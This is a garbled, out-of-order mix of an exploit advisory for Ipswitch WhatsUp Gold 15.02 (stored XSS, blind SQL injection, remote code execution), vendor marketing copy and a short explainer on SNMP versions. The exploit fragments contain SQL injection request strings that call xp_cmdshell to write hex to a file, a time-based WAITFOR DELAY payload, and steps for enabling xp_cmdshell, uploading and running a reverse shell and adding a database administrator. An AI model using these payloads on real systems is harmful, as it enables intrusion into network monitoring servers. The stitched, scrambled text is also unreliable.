GetHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1 EXEC xp_cmdshell 'echo e 0280 >123.hex' -") GetHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1 EXEC xp_cmdshell 'echo e 0200 >123.hex' -") GetHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1 EXEC xp_cmdshell 'echo e 0180 >123.hex' -") GetHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1 EXEC xp_cmdshell 'echo e 0100 >123.hex' -") : Email received from Ipswitch stating that the issue will be fixed ASAP : Response received from CERT with disclosure date set to
Xp_cmdshell on the target, upload a reverse shell to the target, and execute it.
The JavaScript code below will exploit the blind SQL injection vulnerability, enable
WrVMwareHostList.asp?sGroupList=1 WAITFOR DELAY '0:0:10'-&sDeviceList=3 By sending a specially crafted malicious JavaScript payload, the SQLi can be exploited to add a new database administrator to the system, leading to remote code execution. In addition, there is a Blind SQL Injection vulnerability in the file "WrVMwareHostList.asp". Book a demonstration with out of our consultants to learn more.# Exploit Title: Ipswitch WhatsUp Gold 15.02 Stored XSS - Blind SQLi - RCEĪn attacker can modify their nf file with malicious JavaScript as follows: Set us is far more complicated than creating a community string but mitigates many of the risks inherent in SNMP v1 and v2c.Īre you interested in network monitoring solutions? Ipswitch WhatsUp Gold is the industry leader in network monitoring and has been in use by fortune 500 organisations throughout the world, for over fifteen years. It adds a both encryption and authentication options to both prevent snooping and unauthorised access. SNMPv3 was recognised by the IETF in 2004. The risks surrounding the community string still remains.
SNMPv2c was created to alleviate the issue of the 32-bit counters, upgrading the protocols capabilities to support 64-bit. With most devices using the default community string as "public" there is a significant risk of snooping or unauthorised changes depending on whether permissions have been set to read-only or write. SNMP v1 biggest flaw is its use of a clear-text community string, which is used to identify the device and forms a very primitive style of authentication. SNMPv1 is the oldest and original version of the SNMP protocol, supporting 32-bit counters.